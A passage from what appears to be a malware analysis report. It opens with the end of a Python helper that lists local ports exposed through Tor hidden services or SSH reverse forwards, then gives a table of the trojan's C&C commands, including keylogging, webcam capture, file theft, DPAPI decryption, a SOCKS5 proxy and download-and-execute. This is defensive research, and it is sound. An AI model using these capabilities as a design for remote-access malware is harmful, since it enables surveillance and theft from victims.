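                          "target": (parts[1], int(parts[2]))})
    return specs, toks[-1]


def exposed_local_ports(torrc_text=None, ssh_cmdline=None):
    """Sorted list of local TCP ports reachable from outside through either tunnel."""
    ports = set()
    if torrc_text:
        for hs in parse_torrc(torrc_text)["hidden_services"]:
            ports.add(hs["target"][1])
    if ssh_cmdline:
        for spec in parse_ssh_reverse_forwards(ssh_cmdline)[0]:
            ports.add(spec["target"][1])
    return sorted(ports)


if __name__ == "__main__":
    print(parse_torrc(SAMPLE_TORRC))
    print(parse_ssh_reverse_forwards(SAMPLE_SSH_CMDLINE))
    print("exposed local ports:", exposed_local_ports(SAMPLE_TORRC, SAMPLE_SSH_CMDLINE))
```

For incident scoping, the exposed local port is the one to look for in the process's listening sockets: it is the listener the trojan opens to receive commands, and an outbound ssh.exe with a -R forward or a tor process run from a per-user directory with a HiddenServiceDir are the host-side signs of the channel.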
Commands executed by the trojan
After the proxy server is initialized, the trojan creates an HttpListener, connects it to the created server, and waits for commands to arrive.
Below is the list of commands available to the trojan:
Command name | Description |
---|---|
PING | The following response to the C&C server is generated: PONG >> <title> >> <keys> >> 0, where: |
UNINSTALL | Removing the trojan from the infected system: |
REFRESH | The re-collection of system information and user data. |
SCREENSHOT | A screenshot is taken. |
NETDISCOVER | A separate thread is created to scan the local network. |
DPAPI <data> | The trojan decrypts user data that was previously uploaded to the C&C server and can only be decrypted locally on the infected computer. The encrypted data is sent in the argument. |
WEBCAM | A picture is taken with the web camera. |
COMPRESS <file_name> | The specified file is placed into a ZIP archive. The name of the target file is sent in the argument. |
DECOMPRESS <file_name> | A file is extracted from the target ZIP archive. The name of the target archive is sent in the argument. |
TRANSFER | Not implemented. |
GET_FILE <file_name> | The trojan reads the contents of the target file. The name of the target file is sent in the argument. |
LIST_FILES | The current directory is listed. |
LIST_PROCESSES | The trojan creates a list of running processes. |
EXPOSE <ip> <port> <http_version> | The trojan launches an SSH session. The arguments are: |
PROXY_SETUP | The trojan deploys a SOCKS5 proxy server in the infected system: |
KEYLOGGER START | Launches the keylogger. |
KEYLOGGER STOP | Stops the keylogger. |
KEYLOGGER VIEW | Receives data recorded by the keylogger. |
LOADEXEC <url> | Downloads a file and launches it. The argument is the URL for downloading the target file. |
LOADER <url> | Downloads a file. The argument is the URL leading to the target file. |
cd <path> | The current directory is changed. The argument is the path to change the target directory to. |